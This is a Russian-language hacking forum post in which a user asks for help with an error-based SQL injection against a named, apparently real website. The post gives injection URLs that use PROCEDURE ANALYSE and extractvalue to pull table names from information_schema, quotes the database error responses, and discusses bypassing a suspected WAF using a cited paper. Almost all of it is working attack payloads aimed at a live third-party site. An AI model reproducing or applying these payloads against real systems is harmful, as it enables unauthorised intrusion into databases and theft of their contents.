ANTICHAT - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Цитата:

Сообщение от Sensoft

↑
там waf

ссылается на неверный запрос:

Вроде не waf, а я как-то неправильно составил запрос.

Допускается кстати и так но ошибка идиентичная

Код:

http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand()%2cconcat(0x3a%2cCONCAT(TABLE_NAME)))%2c1)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--%201

Цитата:

Сообщение от None

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736' at line 1

Нашел интересную книгу

https://www.ptsecurity.com/upload/co...eev-CC-WAF.pdf

Попытался сделать по ней но тот же результат:

http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(TAB LE_NAME))),1)+ascii(lower(mid((from+information_sc hema.tables),1,1)))-- 1

По ней составил запрос для обхода WAF

Цитата:

Сообщение от None

http://wellaprof.elle.ru/competitio...d((database()),10,1))),0x71),0x71)))) ,1) -- 2

Выводит значение XPATH syntax error: ':108'

А такое же значение как и (0x3a%2cCONCAT(TABLE_NAME)

Но понять не могу что фильтрует и как это обойти, чтобы вывести данные.

Цитата:

Сообщение от None
http://wellaprof.elle.ru/competitio...id((table_name),1,1))),0x71),0x71)))) ,1) -- 2